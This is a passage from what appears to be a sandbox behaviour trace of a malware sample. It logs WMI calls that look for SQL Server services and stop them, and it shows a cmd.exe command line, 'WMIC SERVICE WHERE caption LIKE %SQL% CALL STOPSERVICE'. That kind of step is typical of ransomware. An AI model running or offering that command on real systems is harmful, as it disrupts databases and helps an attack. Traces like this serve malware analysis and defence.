(Locale=0x800, dwCmpFlags=0x20001, lpString1="caption LIKE '%MSSQL%'", cchCount1=22, lpString2="-", cchCount2=1) returned 3 [0103.820] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0103.820] lstrlenW (lpString="caption LIKE '%MSSQL%'") returned 22 [0103.820] lstrlenW (lpString="/") returned 1 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="/", cchCount2=1) returned 3 [0103.820] lstrlenW (lpString="-") returned 1 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="-", cchCount2=1) returned 3 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] lstrlenW (lpString="GET") returned 3 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0103.820] lstrlenW (lpString="LIST") returned 4 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0103.820] lstrlenW (lpString="SET") returned 3 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0103.820] lstrlenW (lpString="CREATE") returned 6 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] lstrlenW (lpString="CALL") returned 4 [0103.820] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0103.821] lstrlenW (lpString="/") returned 1 [0103.821] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.821] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0103.821] lstrlenW (lpString="-") returned 1 [0103.821] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.821] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0103.821] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.821] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.821] GetCurrentThreadId () returned 0xc4c [0103.821] ??0CHString@@QAE@XZ () returned 0xa4f1e4 [0103.821] lstrlenA (lpString="MSFT_CliAlias.FriendlyName='") returned 28 [0103.821] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1301478, cbMultiByte=-1, lpWideCharStr=0xf48a88, cchWideChar=29 | out: lpWideCharStr="MSFT_CliAlias.FriendlyName='") returned 29 [0103.821] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='") returned 0x1c [0103.821] SysStringLen (param_1="SERVICE") returned 0x7 [0103.821] SysStringLen (param_1="MSFT_CliAlias.FriendlyName='SERVICE") returned 0x23 [0103.821] SysStringLen (param_1="'") returned 0x1 [0103.821] IWbemServices:GetObject (in: This=0xce0a60, strObjectPath="MSFT_CliAlias.FriendlyName='SERVICE'", lFlags=0, pCtx=0x0, ppObject=0xa4f1c0*=0x0, ppCallResult=0x0 | out: ppObject=0xa4f1c0*=0xd054d0, ppCallResult=0x0) returned 0x0 [0103.825] lstrlenW (lpString="CALL") returned 4 [0103.825] lstrlenW (lpString="CALL") returned 4 [0103.825] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0103.825] IWbemClassObject:Get (in: This=0xd054d0, wszName="Verbs", lFlags=0, pVal=0xa4f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f178*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0xcf02f0*(cDims=0x1, fFeatures=0x240, cbElements=0x4, cLocks=0x0, pvData=0xcf0070, rgsabound=((cElements=0xa, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.826] SafeArrayGetLBound (in: psa=0xcf02f0, nDim=0x1, plLbound=0xa4f188 | out: plLbound=0xa4f188) returned 0x0 [0103.826] SafeArrayGetUBound (in: psa=0xcf02f0, nDim=0x1, plUbound=0xa4f190 | out: plUbound=0xa4f190) returned 0x0 [0103.826] SafeArrayGetElement (in: psa=0xcf02f0, rgIndices=0xa4f198, pv=0xa4f1cc | out: pv=0xa4f1cc) returned 0x0 [0103.826] IWbemClassObject:Get (in: This=0xd06e98, wszName="Name", lFlags=0, pVal=0xa4f168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.826] lstrlenW (lpString="StartService") returned 12 [0103.826] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0103.826] IUnknown:Release (This=0xd06e98) returned 0x1 [0103.826] SafeArrayGetElement (in: psa=0xcf02f0, rgIndices=0xa4f198, pv=0xa4f1cc | out: pv=0xa4f1cc) returned 0x0 [0103.826] IWbemClassObject:Get (in: This=0xd073c8, wszName="Name", lFlags=0, pVal=0xa4f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StartService", varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f168*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.826] lstrlenW (lpString="StopService") returned 11 [0103.826] lstrlenW (lpString="STOPSERVICE") returned 11 [0103.826] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="STOPSERVICE", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0103.827] GetCurrentThreadId () returned 0xc4c [0103.827] ??0CHString@@QAE@XZ () returned 0xa4efe4 [0103.827] IWbemClassObject:Get (in: This=0xd073c8, wszName="Description", lFlags=0, pVal=0xa4efb4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4efb4*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.827] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.827] IWbemClassObject:Get (in: This=0xd073c8, wszName="Parameters", lFlags=0, pVal=0xa4f158*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f158*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.827] IWbemClassObject:Get (in: This=0xd073c8, wszName="VerbType", lFlags=0, pVal=0xa4f0f0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f0f0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.827] IWbemClassObject:Get (in: This=0xd073c8, wszName="Derivation", lFlags=0, pVal=0xa4f0d8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0xa4f0d8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="StopService", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0 [0103.827] lstrlenW (lpString="StopService") returned 11 [0103.827] lstrlenW (lpString="StopService") returned 11 [0103.827] IUnknown:Release (This=0xd073c8) returned 0x1 [0103.827] IUnknown:Release (This=0xd054d0) returned 0x0 [0103.828] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.828] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.828] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.828] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x727466 | out: _String="Select", _Context=0x727466) returned="Select" [0103.828] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727466 | out: _String=0x0, _Context=0x727466) returned="*" [0103.828] lstrlenW (lpString="FROM") returned 4 [0103.828] lstrlenW (lpString="*") returned 1 [0103.828] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0103.828] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727466 | out: _String=0x0, _Context=0x727466) returned="from" [0103.828] lstrlenW (lpString="FROM") returned 4 [0103.829] lstrlenW (lpString="from") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0103.829] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727466 | out: _String=0x0, _Context=0x727466) returned="Win32_Service" [0103.829] lstrlenW (lpString="SET") returned 3 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0103.829] lstrlenW (lpString="CREATE") returned 6 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0103.829] lstrlenW (lpString="GET") returned 3 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0103.829] lstrlenW (lpString="LIST") returned 4 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0103.829] lstrlenW (lpString="ASSOC") returned 5 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0103.829] WbemLocator:IUnknown:AddRef (This=0xcc3330) returned 0x3 [0103.829] lstrlenW (lpString="") returned 0 [0103.829] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="LHNIWSJ", cchCount1=7, lpString2="", cchCount2=0) returned 3 [0103.829] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.829] lstrlenW (lpString="LHNIWSJ") returned 7 [0103.829] GetCurrentThreadId () returned 0xc4c [0103.829] GetCurrentProcess () returned 0xffffffff [0103.829] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0xa4fae8 | out: TokenHandle=0xa4fae8*=0x270) returned 1 [0103.829] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xa4fae4 | out: TokenInformation=0x0, ReturnLength=0xa4fae4) returned 0 [0103.829] GetTokenInformation (in: TokenHandle=0x270, TokenInformationClass=0x3, TokenInformation=0xf48bb8, TokenInformationLength=0x118, ReturnLength=0xa4fae4 | out: TokenInformation=0xf48bb8, ReturnLength=0xa4fae4) returned 1 [0103.829] AdjustTokenPrivileges (in: TokenHandle=0x270, DisableAllPrivileges=0, NewState=0xf48bb8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0103.829] CloseHandle (hObject=0x270) returned 1 [0103.829] lstrlenW (lpString="GET") returned 3 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0103.829] lstrlenW (lpString="LIST") returned 4 [0103.829] lstrlenW (lpString="CALL") returned 4 [0103.829] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0103.829] lstrlenW (lpString="SET") returned 3 [0103.830] lstrlenW (lpString="CALL") returned 4 [0103.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0103.830] lstrlenW (lpString="CALL") returned 4 [0103.830] lstrlenW (lpString="CALL") returned 4 [0103.830] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="CALL", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0103.830] ??0CHString@@QAE@XZ () returned 0xa4faa8 [0103.830] GetCurrentThreadId () returned 0xc4c [0103.830] SysStringLen (param_1="\\\\") returned 0x2 [0103.830] SysStringLen (param_1="LHNIWSJ") returned 0x7 [0103.830] SysStringLen (param_1="\\\\LHNIWSJ") returned 0x9 [0103.830] SysStringLen (param_1="\\") returned 0x1 [0103.830] SysStringLen (param_1="\\\\LHNIWSJ\\") returned 0xa [0103.830] SysStringLen (param_1="ROOT\\CIMV2") returned 0xa [0103.830] WbemLocator:IWbemLocator:ConnectServer (in: This=0xcc3330, strNetworkResource="\\\\LHNIWSJ\\ROOT\\CIMV2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0x1349564 | out: ppNamespace=0x1349564*=0xce06f0) returned 0x0 [0103.835] CoSetProxyBlanket (pProxy=0xce06f0, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.835] ??1CHString@@QAE@XZ () returned 0x74a66430 [0103.835] ??0CHString@@QAE@XZ () returned 0xa4faa4 [0103.835] GetCurrentThreadId () returned 0xc4c [0103.836] lstrlenA (lpString="") returned 0 [0103.836] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xf48b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.836] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.836] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.836] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x727702 | out: _String="Select", _Context=0x727702) returned="Select" [0103.836] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727702 | out: _String=0x0, _Context=0x727702) returned="*" [0103.836] lstrlenW (lpString="FROM") returned 4 [0103.836] lstrlenW (lpString="*") returned 1 [0103.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0103.836] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727702 | out: _String=0x0, _Context=0x727702) returned="from" [0103.836] lstrlenW (lpString="FROM") returned 4 [0103.836] lstrlenW (lpString="from") returned 4 [0103.836] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0103.836] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x727702 | out: _String=0x0, _Context=0x727702) returned="Win32_Service" [0103.836] IWbemServices:GetObject (in: This=0xce06f0, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0xa4fa7c*=0x0, ppCallResult=0x0 | out: ppObject=0xa4fa7c*=0xd3ab10, ppCallResult=0x0) returned 0x0 [0103.858] IWbemClassObject:GetMethod (in: This=0xd3ab10, wszName="STOPSERVICE", lFlags=0, ppInSignature=0xa4fa88, ppOutSignature=0xa4fa74 | out: ppInSignature=0xa4fa88*=0x0, ppOutSignature=0xa4fa74*=0xd3ae90) returned 0x0 [0103.859] IUnknown:Release (This=0xd3ae90) returned 0x0 [0103.859] IUnknown:Release (This=0xd3ab10) returned 0x0 [0103.860] ??0CHString@@QAE@XZ () returned 0xa4f954 [0103.860] GetCurrentThreadId () returned 0xc4c [0103.860] lstrlenA (lpString="") returned 0 [0103.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xf48b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.860] lstrlenA (lpString="") returned 0 [0103.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1302b44, cbMultiByte=-1, lpWideCharStr=0xf48b38, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0103.860] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.860] lstrlenW (lpString="Select * from Win32_Service") returned 27 [0103.860] wcstok (in: _String="Select * from Win32_Service", _Delimiter=" ", _Context=0x72778a | out: _String="Select", _Context=0x72778a) returned="Select" [0103.860] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x72778a | out: _String=0x0, _Context=0x72778a) returned="*" [0103.860] lstrlenW (lpString="FROM") returned 4 [0103.860] lstrlenW (lpString="*") returned 1 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1 [0103.860] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x72778a | out: _String=0x0, _Context=0x72778a) returned="from" [0103.860] lstrlenW (lpString="FROM") returned 4 [0103.860] lstrlenW (lpString="from") returned 4 [0103.860] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2 [0103.860] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x72778a | out: _String=0x0, _Context=0x72778a) returned="Win32_Service" [0103.860] lstrlenA (lpString="SELECT * FROM ") returned 14 [0103.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x130431c, cbMultiByte=-1, lpWideCharStr=0xf49000, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0103.860] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0103.860] SysStringLen (param_1="Win32_Service") returned 0xd [0103.860] lstrlenA (lpString=" WHERE ") returned 7 [0103.860] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1303770, cbMultiByte=-1, lpWideCharStr=0xf48d38, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0103.860] SysStringLen (param_1=" WHERE ") returned 0x7 [0103.861] SysStringLen (param_1="caption LIKE '%MSSQL%'") returned 0x16 [0103.861] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0103.861] SysStringLen (param_1=" WHERE caption LIKE '%MSSQL%'") returned 0x1d [0103.861] IWbemServices:ExecQuery (in: This=0xce06f0, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE caption LIKE '%MSSQL%'", lFlags=48, pCtx=0x0, ppEnum=0xa4f95c | out: ppEnum=0xa4f95c*=0xd08170) returned 0x0 [0103.874] CoSetProxyBlanket (pProxy=0xd08170, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0103.916] IEnumWbemClassObject:Next (in: This=0xd08170, lTimeout=-1, uCount=0x1, apObjects=0xa4f960, puReturned=0xa4f94c | out: apObjects=0xa4f960*=0x0, puReturned=0xa4f94c*=0x0) returned 0x1 [0104.300] IUnknown:Release (This=0xd08170) returned 0x0 [0104.301] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.301] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.301] GetCurrentThreadId () returned 0xc4c [0104.301] ??0CHString@@QAE@PBG@Z () returned 0xa4fb18 [0104.301] ??YCHString@@QAEABV0@PBG@Z () returned 0xa4fb18 [0104.301] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0xf49060, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0104.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0104.301] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0xf48a98, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0104.301] __iob_func () returned 0x77ac1208 [0104.301] fprintf (in: _File=0x77ac1228, _Format="%s" | out: _File=0x77ac1228) returned 27 [0104.302] __iob_func () returned 0x77ac1208 [0104.302] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0104.302] ??1CHString@@QAE@XZ () returned 0x1 [0104.302] IUnknown:Release (This=0xce06f0) returned 0x0 [0104.303] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0104.303] _kbhit () returned 0x0 [0104.304] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0104.304] WbemLocator:IUnknown:Release (This=0xcc3330) returned 0x2 [0104.304] IUnknown:Release (This=0xce0c90) returned 0x0 [0104.305] IUnknown:Release (This=0xce0a60) returned 0x0 [0104.305] WbemLocator:IUnknown:Release (This=0xcc3330) returned 0x1 [0104.305] ?Empty@CHString@@QAEXXZ () returned 0x74a66424 [0104.305] WbemLocator:IUnknown:Release (This=0xcc3330) returned 0x0 [0104.306] CoUninitialize () [0104.325] exit (_Code=0) [0104.325] ??1CHString@@QAE@XZ () returned 0x74a66430 [0104.325] ??1CHString@@QAE@XZ () returned 0x74a66430 Thread: id = 138 os_tid = 0xc5c Thread: id = 139 os_tid = 0xc60 Thread: id = 140 os_tid = 0xc64 Thread: id = 141 os_tid = 0xc68 Process: id = "25" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0xa3a2000" os_pid = "0xc6c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xb54" cmd_line = "/c WMIC SERVICE WHERE 'caption LIKE '%SQL%'' CALL STOPSERVICE" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001714b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1691 start_va = 0x3c0000 end_va = 0x40ffff entry_point = 0x3c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 1692 start_va = 0xb20000 end_va = 0x4b1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b20000" filename = "" Region: id = 1693 start_va = 0x4b20000 end_va = 0x4b3ffff entry_point = 0x0 region_type = private name = "private_0x0000000004b20000" filename = "" Region: id = 1694 start_va = 0x4b40000 end_va = 0x4b41fff entry_point = 0x0 region_type = private name = "private_0x0000000004b40000" filename = "" Region: id = 1695 start_va = 0x4b50000 end_va = 0x4b63fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004b50000" filename = "" Region: id = 1696 start_va = 0x4b70000 end_va = 0x4baffff entry_point = 0x0 region_type = private name = "private_0x0000000004b70000" filename = "" Region: id = 1697 start_va = 0x4bb0000 end_va = 0x4caffff entry_point = 0x0 region_type = private name = "private_0x0000000004bb0000" filename = "" Region: id = 1698 start_va = 0x4cb0000 end_va = 0x4cb3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cb0000" filename = "" Region: id = 1699 start_va = 0x4cc0000 end_va = 0x4cc0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004cc0000" filename = "" Region: id = 1700 start_va = 0x4cd0000 end_va = 0x4cd1fff entry_point = 0x0 region_type = private name = "private_0x0000000004cd0000" filename = "" Region: id = 1701 start_va = 0x77c40000 end_va = 0x77db8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1702 start_va = 0x7ebe0000 end_va = 0x7ec02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ebe0000" filename = "" Region: id = 1703 start_va = 0x7ec04000 end_va = 0x7ec04fff entry_point = 0x0 region_type = private name = "private_0x000000007ec04000" filename = "" Region: id = 1704 start_va = 0x7ec06000 end_va = 0x7ec06fff entry_point = 0x0 region_type = private name = "private_0x000000007ec06000" filename = "" Region: id = 1705 start_va = 0x7ec0d000 end_va = 0x7ec0ffff entry_point = 0x0 region_type = private name = "private_0x000000007ec0d000" filename = "" Region: id = 1706 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1707 start_va = 0x7fff0000 end_va = 0x7dfc03e6ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1708 start_va = 0x7dfc03e70000 end_va = 0x7ffc03e6ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfc03e70000" filename = "" Region: id = 1709 start_va = 0x7ffc03e70000 end_va = 0x7ffc04031fff entry_point = 0x7ffc03e70000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1710 start_va = 0x7ffc04032000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffc04032000" filename = "" Region: id = 1711 start_va = 0x4e70000 end_va = 0x4e7ffff entry_point = 0x0 region_type = private name = "private_0x0000000004e70000" filename = "" Region: id = 1712 start_va = 0x59300000 end_va = 0x5934efff entry_point = 0x59300000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1713 start_va = 0x59360000 end_va = 0x593d2fff entry_point 